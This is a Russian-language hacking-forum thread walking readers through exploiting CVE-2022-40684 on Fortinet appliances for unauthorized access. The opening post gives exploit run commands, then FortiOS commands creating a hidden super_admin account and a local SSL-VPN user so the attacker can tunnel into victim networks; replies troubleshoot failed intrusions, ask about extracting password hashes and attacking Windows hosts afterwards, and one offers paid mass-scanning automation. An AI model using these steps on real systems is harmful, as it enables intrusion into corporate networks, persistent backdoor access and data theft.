Мануал/Книга Fortinet CVE-2022-40684

[Crypto2000]

Моя первая статья на данном форуме. Для тех кто тыкается, но так и не приткнул.
Как добывать материал тут уж каждый сам решает для себя, мы же разберем exploit'ы для эксплуатации CVE-2022-40684,
примерное направление куда копать (для тех кто в танке).
На GitHub уже выложили достаточно реализаций данной CVE, рассмотрим 2 для точечного использования:
1) https://github.com/mohamedbenchikh/CVE-2022-40684 2)https://github.com/Chocapikk/CVE-2022-40684
Для начала нам нужно сгенерировать ssh-сертификат: ssh-keygen
все дополнительные предложения пропускаем нажатием Enter
Ваш ssh сертификат готов, путь до файла (может кто-то не в курсе)
Win: C:\Users\Username*\.ssh\id_rsa.pub, Linux: /home/kali*/.ssh/id_rsa.pub

Плюс первой реализации данного эксплоита от mohamedbenchikh, что мы можем узнать логины действующих администраторов и их права на сервере
Запуск производится командой: python CVE-2022-40684.py -k C:\Users\Username*\.ssh\id_rsa.pub -c -v -t Ваш_IP

Благодаря второй реализации есть возможность указать логин учетки администратора и привязать к ней свой публичный ключ ssh
Запуск: python exploit.py -k C:\Users\Username*\.ssh\id_rsa.pub -U Support -u Ваш_IP

Что же дальше, где нам взять logg/pass от нашего VPN?
Для начала создадим запись нового администратора:

config system admin
    edit "admin1"   -создаем новую запись
        set accprofile "super_admin"  -присваиваем права супер админа
        set vdom "root"
        set password P@$$w0rd  -задаем пароль
    end  - выход из директории

Создание учетки локального пользователя:

config user local
edit fortiuser222
set type password
set passwd Parol
end

Дальше мы просто переходим по IP-адресу в нашем браузере и логинимся при помощи нашей учетки администратора!!!
Переходим во вкладку VPN - SSL-VPN Settings и наблюдаем такую картину:

Добавляем нашу учетку локального пользователя кнопкой - Create New (далее следуем инструкциям)

Спойлер: Apply

Не забываем применить изменения

Качаем Fortinet VPN client указываем IP/port хоста для подключения и будет Вам счастье
При возникновении вопросов: "у меня так не работает", "не переходит по ссылке в браузере", просьба не засорять ПМ,
а писать под этой темой. Поможем друг другу, будем командой)))))))

Данный мини экскурс меня подтолкнуло написать куча однотипных сообщений после моего ответа в данной теме.
Обещали даже оплатить статью, ну я в принципе и не против донатов)
На икру и проссеко: bitcoin: bc1qx56q2t87rgn8032j8k7kqttv4fpe0k9c8kef99
Всем спасибо, всех обнял!!!
​

 

[pepel]

ТС, прости что пишу в твоей теме, очень нужна работа,
Могу автоматизировать добавление учетки и первичный скан с подключением к впн за символич. плату. Так же, по вашему желанию могу переписать и привязать сюда скрипт бастерлорда (либо отдельные его пункты). Так же, по вашему желанию могу сделать аналог такого /threads/65288, многопоточно. С вас материал для тестов.
Контакты:
jid: bl1nk @ thesecure.at
tox: 7111ED1FBC0DBD2B9408B2A3F9255C4ED5DD59BAEBEF8DA13939E9AFBB6D23525C3C0ABAEAEE

 

[prox]

Запуск: python CVE-2022-40684.py -k C:\Users\Username*\.ssh\id_rsa.pub -U Support -u Ваш_IP

Вероятно Вы имели ввиду:
python exploit.py -k C:\Users\Username*\.ssh\id_rsa.pub -U Support -u Ваш_IP
( вторая реализация)

 

[wav]

ТС респект. плохо что этот форум мониторят азигунгарунгэ, так, что тема проживёт не долго!
Кстате по теме id_rsa.pub не нужно быть в курсе по путям, ложишь рядом с экспом и всё норм.
Странно, при второй реализации нет конекта, хотя в певой кажет юзверей
[X] Connection error !! : https://IP

 

[Crypto2000]

Вероятно Вы имели ввиду:
python exploit.py -k C:\Users\Username*\.ssh\id_rsa.pub -U Support -u Ваш_IP
( вторая реализация)
Посмотреть вложение 44395

Благодарю, исправил, моя невнимательность)

 

[Crypto2000]

Кстате по теме id_rsa.pub не нужно быть в курсе по путям, ложишь рядом с экспом и всё норм.

Специально для танкистов)))
А по счет проживет не долго, это паблик сплоит, можно и нужно делится инфой, которая и так весит в открытом виде))

 

[larryflint]

куча таргетов и все Target *** partially vulnerable because SSH connection was not successful, please do further enumeration
у всех так?

 

[National Hazard Agency]

куча таргетов и все Target *** partially vulnerable because SSH connection was not successful, please do further enumeration
у всех так?

бикоз чтобы сплоит ворк =) нид 22 порт иф ю ноу а таких акссесс только 60 000 по миру удачи в эксплуатации =) - это я про фортиос

 

[Antarus]

Чувствует будет полная жопа корпам.

 

[wav]

куча таргетов и все Target *** partially vulnerable because SSH connection was not successful, please do further enumeration
у всех так?

это нормально, значит можно ссш юзать ужо!

 

[wav]

бяка, а не бага )

 

[mixl]

1) бывает иногда вот такое
UXAQX # config system admin
8497: Unknown action 3
Command fail. Return code -1
2) после добавления локального юзера + расшаривания прав почему-то все равно не дает зайти не через веб, не через клиент, пишет permissions denied / login/password incorrect

 

[Crypto2000]

1) бывает иногда вот такое
UXAQX # config system admin
8497: Unknown action 3
Command fail. Return code -1
2) после добавления локального юзера + расшаривания прав почему-то все равно не дает зайти не через веб, не через клиент, пишет permissions denied / login/password incorrect

1) Убедись что учетка администратора, под которой ты зашел, имеет права "super_admin". В ином случае может встречаться фильтрация
2) Можешь проверить настройки файрвола, либо ты и правда вводишь неверные данные...

 

[SDA]

Target https://xxxxxx partially vulnerable because SSH connection was not successful,
please do further enumeration
is there anyway to get around this?

 

[Crypto2000]

Target https://xxxxxx partially vulnerable because SSH connection was not successful,
please do further enumeration
is there anyway to get around this?

This issue has already been answered above!
An open ssh port is required for successful operation.

 

[c0v1d21]

Насколько высоки шансы попасть потом в периметр не имея на руках кредов пользователей ?

 

[The CaT]

This issue has already been answered above!
An open ssh port is required for successful operation.

А можно выдернуть пароли или хэши с рут доступом для локальных юзеров

 

[Crypto2000]

А можно выдернуть пароли или хэши с рут доступом для локальных юзеров

Пароли хранятся в зашифрованном виде ENC *** (aes base64)
config user local - show
Команды по консоли вы можете найти в документации, но видимо мало кто тут такое читает…

 

[bongiorno]

Подскажите настройки фаервола, где-то ставлю одни нормально, где то ставлю такие же, 7200 ошибка

 

[SDA]

Can anybody share what tools they use to attack the windows machines after connecting to the vpn?
what exploits should be used to get access?